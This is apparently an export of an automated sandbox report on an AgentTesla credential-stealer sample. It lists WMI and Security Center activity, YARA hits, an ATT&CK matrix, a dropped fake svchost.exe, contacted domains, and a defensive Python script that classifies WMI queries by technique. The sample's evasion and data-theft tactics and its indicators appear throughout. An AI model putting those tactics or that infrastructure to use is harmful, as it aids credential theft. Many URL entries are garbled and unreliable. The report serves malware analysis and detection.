            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Note that the source of all five entries is the system's own C:\Windows\System32\svchost.exe, not the dropped svchost.exe under C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\. When attributing this behaviour, check which service that svchost.exe instance hosts rather than reading the process name alone as evidence that the dropped binary did it.
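The Security Center entries above are the kind of observable that the report's "Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)" and "Queries sensitive BIOS Information (via WMI, ...)" signatures key on. The Python below is an added example, not code from the report or from Joe Sandbox: it parses sandbox "WMI Queries" lines in the format printed above and maps the WMI classes they reference to ATT&CK techniques, so a triage script can turn a raw query list into tactic-level findings. The class-to-technique table is the author's assumption about how those classes are normally used, and the ROOT\CIMV2 lines for Win32_Bios, Win32_NetworkAdapter and Win32_Process are constructed in the report's format (the report only names the first two classes in its signature list and does not print their queries).

```python
"""Map sandbox-recorded WMI queries to ATT&CK techniques.

Added example, not code from the Joe Sandbox report. Input lines follow the
report's "WMI Queries" format:
    IWbemServices::<Method> - <Namespace> : <Class name or WQL statement>
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# One "WMI Queries" entry as the report prints it.
WMI_LINE = re.compile(
    r"IWbemServices::(?P<method>\w+)\s*-\s*(?P<ns>[\w\\]+)\s*:\s*(?P<body>.+)$"
)
# Class references inside a WQL statement: "FROM Win32_Bios", "ISA 'AntiVirusProduct'".
CLASS_REF = re.compile(r"(?:FROM\s+|ISA\s+')(\w+)", re.IGNORECASE)

# Assumed mapping (the author's, not the report's) from WMI class to the
# technique that querying it usually serves.
TECHNIQUES = {
    "AntiVirusProduct": "T1518.001 Security Software Discovery",
    "FirewallProduct": "T1518.001 Security Software Discovery",
    "AntiSpywareProduct": "T1518.001 Security Software Discovery",
    "Win32_Bios": "T1497.001 Virtualization/Sandbox Evasion: System Checks",
    "Win32_BaseBoard": "T1497.001 Virtualization/Sandbox Evasion: System Checks",
    "Win32_NetworkAdapter": "T1016 System Network Configuration Discovery",
}
# Anything enumerated from these namespaces is security-software discovery
# even when the class is not listed above.
SECURITY_CENTER_NS = {"ROOT\\SECURITYCENTER", "ROOT\\SECURITYCENTER2"}


@dataclass(frozen=True)
class WmiFinding:
    method: str
    namespace: str
    wmi_class: str
    technique: str


def classes_in(body: str) -> list[str]:
    """WMI classes a query body refers to.

    CreateInstanceEnum carries a bare class name; ExecQuery and
    ExecNotificationQuery carry WQL, which is scanned for FROM / ISA references.
    System event classes (double-underscore prefix) are dropped: the class of
    interest is the one named in the ISA filter, not __InstanceOperationEvent.
    """
    refs = CLASS_REF.findall(body)
    if not refs:
        return [body.strip()]
    return [r for r in refs if not r.startswith("__")]


def classify_line(line: str) -> list[WmiFinding]:
    """Findings for one report line; empty for lines that are not WMI queries."""
    m = WMI_LINE.search(line)
    if not m:
        return []
    ns = m.group("ns")
    findings = []
    for cls in classes_in(m.group("body")):
        technique = TECHNIQUES.get(cls)
        if technique is None and ns.upper() in SECURITY_CENTER_NS:
            technique = "T1518.001 Security Software Discovery"
        if technique:
            findings.append(WmiFinding(m.group("method"), ns, cls, technique))
    return findings


def classify(lines) -> dict[str, list[WmiFinding]]:
    """Group findings by technique, preserving the order they were seen."""
    by_technique: dict[str, list[WmiFinding]] = {}
    for line in lines:
        for f in classify_line(line):
            by_technique.setdefault(f.technique, []).append(f)
    return by_technique


# Constructed sample: the four Security Center queries as the report lists them,
# plus ROOT\CIMV2 queries written in the same format for the Win32_Bios and
# Win32_NetworkAdapter classes the report's signature list names, and one
# Win32_Process query as a benign control that should produce no finding.
SAMPLE_LINES = [
    "IWbemServices::ExecNotificationQuery - ROOT\\SecurityCenter : SELECT * FROM "
    "__InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR "
    "TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'",
    "IWbemServices::CreateInstanceEnum - ROOT\\SecurityCenter2 : FirewallProduct",
    "IWbemServices::CreateInstanceEnum - ROOT\\SecurityCenter2 : AntiVirusProduct",
    "IWbemServices::CreateInstanceEnum - ROOT\\SecurityCenter2 : AntiSpywareProduct",
    "IWbemServices::ExecQuery - ROOT\\CIMV2 : SELECT * FROM Win32_Bios",
    "IWbemServices::ExecQuery - ROOT\\CIMV2 : SELECT * FROM Win32_NetworkAdapter",
    "IWbemServices::ExecQuery - ROOT\\CIMV2 : SELECT Name FROM Win32_Process",
]

if __name__ == "__main__":
    for technique, hits in classify(SAMPLE_LINES).items():
        print(f"{technique}: {len(hits)} queries")
        for h in hits:
            print(f"    {h.method} {h.namespace} {h.wmi_class}")
```

The namespace fallback matters for the first line: its FROM clause names the generic event class, and only the ISA filters name the products being watched, so a classifier that looked at the FROM clause alone would miss the Security Center subscription entirely.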

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 00000000.00000002.304230234.000000000434C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.qINcOlwRud.exe.43826f0.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.qINcOlwRud.exe.434c6d0.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.qINcOlwRud.exe.434c6d0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.qINcOlwRud.exe.43826f0.7.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | File source: 00000000.00000002.304230234.000000000434C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.qINcOlwRud.exe.43826f0.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.qINcOlwRud.exe.434c6d0.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.qINcOlwRud.exe.434c6d0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.qINcOlwRud.exe.43826f0.7.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

The matrix is listed here by tactic, one column per line. Numbers in parentheses are the badges the report attaches to the techniques it observed for this sample, run together by the page export; entries without a number are the unobserved cells of the standard matrix.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation (221); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection (11); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Masquerading (113); Disable or Modify Tools (21); Virtualization/Sandbox Evasion (361); Process Injection (11); Obfuscated Files or Information (1); Timestomp (1); DLL Side-Loading (1)
Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery (351); Process Discovery (1); Virtualization/Sandbox Evasion (361); Application Window Discovery (1); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (123)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Input Capture (1); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel (12); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (3); Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

            Behavior Graph

(The graph itself is an image and is not reproduced; the node labels it carried are listed below.)

Behavior Graph ID: 383942 | Sample: qINcOlwRud.exe | Startdate: 08/04/2021 | Architecture: WINDOWS | Score: 100

Top-level signatures: Found malware configuration; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 5 other signatures
DNS: smtp.yandex.ru; smtp.yandex.com
Network: myliverpoolnews.cf 104.21.56.119, port 443 (client ports 49682, 49683), CLOUDFLARENET US, United States, contacted by qINcOlwRud.exe; 127.0.0.1 (unknown, unknown), contacted by one of the 7 other top-level processes
Dropped files: C:\Program Files\Common Files\...\svchost.exe (PE32) and C:\...\svchost.exe:Zone.Identifier (ASCII), both by qINcOlwRud.exe; C:\ProgramData\Microsoft\...\Report.wer (Little-endian) by WerFault.exe

Process tree:
qINcOlwRud.exe (signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Adds a directory exclusion to Windows Defender; 2 other signatures)
    WerFault.exe
    cmd.exe, which started 2 other processes
    powershell.exe, which started conhost.exe
    3 other processes, which started conhost.exe (twice)
svchost.exe (signature: Hides threads from debuggers)
    cmd.exe, which started 2 other processes
    powershell.exe, which started conhost.exe
    powershell.exe, which started conhost.exe
    2 other processes, which started conhost.exe
svchost.exe
    3 other processes, which started 3 other processes
7 other processes (signature: Changes security center settings (notifications, updates, antivirus, firewall))

            Screenshots


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

Source | Detection | Scanner | Label (where given)
qINcOlwRud.exe | 22% | Virustotal
qINcOlwRud.exe | 27% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx
qINcOlwRud.exe | 100% | Joe Sandbox ML

            Dropped Files

Source | Detection | Scanner | Label (where given)
C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | 100% | Joe Sandbox ML
C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | 27% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx

            Unpacked PE Files

            No Antivirus matches

            Domains

Source | Detection | Scanner | Label (where given)
myliverpoolnews.cf | 5% | Virustotal

            URLs

Source | Detection | Scanner | Label (where given)
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818. | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02- | 0% | URL Reputation | safe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803. | 0% | URL Reputation | safe
http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C1A7BF393BEFEDE5EF77372F8A536BC.html | 4% | Virustotal
http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C1A7BF393BEFEDE5EF77372F8A536BC.html | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03- | 0% | URL Reputation | safe
https://www.liverpool.com/all-about/premier-league | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png | 0% | URL Reputation | safe
            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
            https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
            https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
            https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
            https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe

Domains and IPs

Contacted Domains

Columns: Name, IP, Active, Malicious, Antivirus Detection, Reputation

smtp.yandex.ru
IP: 77.88.21.158
Active: true
Malicious: false
Reputation: high

myliverpoolnews.cf
IP: 104.21.56.119
Active: true
Malicious: false
Reputation: unknown

smtp.yandex.com
IP: unknown
Active: unknown
Malicious: false
Reputation: high

Contacted URLs

Columns: Name, Malicious, Antivirus Detection, Reputation

http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C1A7BF393BEFEDE5EF77372F8A536BC.html
Malicious: false
• 4%, Virustotal, Browse
• Avira URL Cloud: safe
Reputation: unknown

http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html
Malicious: false
• 4%, Virustotal, Browse
• Avira URL Cloud: safe
Reputation: unknown

http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A8BB9FBC655E731A0C6CD58E2C4B52B7.html
Malicious: false
• Avira URL Cloud: safe
Reputation: unknown

URLs from Memory and Binaries

Columns: Name, Source, Malicious, Antivirus Detection, Reputation

https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000015.00000002.326476300.0000023ABEC3D000.00000004.00000001.sdmp
Malicious: false
Reputation: high

https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 00000015.00000003.314649604.0000023ABEC54000.00000004.00000001.sdmp
Malicious: false
Reputation: high

https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://c.amazon-adsystem.com/aax2/apstag.js
Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp
Malicious: false
Reputation: high

https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmp
Malicious: false
Reputation: high

https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp; qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000015.00000003.313784192.0000023ABEC49000.00000004.00000001.sdmp
Malicious: false
Reputation: high

https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000015.00000002.326636259.0000023ABEC42000.00000004.00000001.sdmp
Malicious: false
Reputation: high

https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
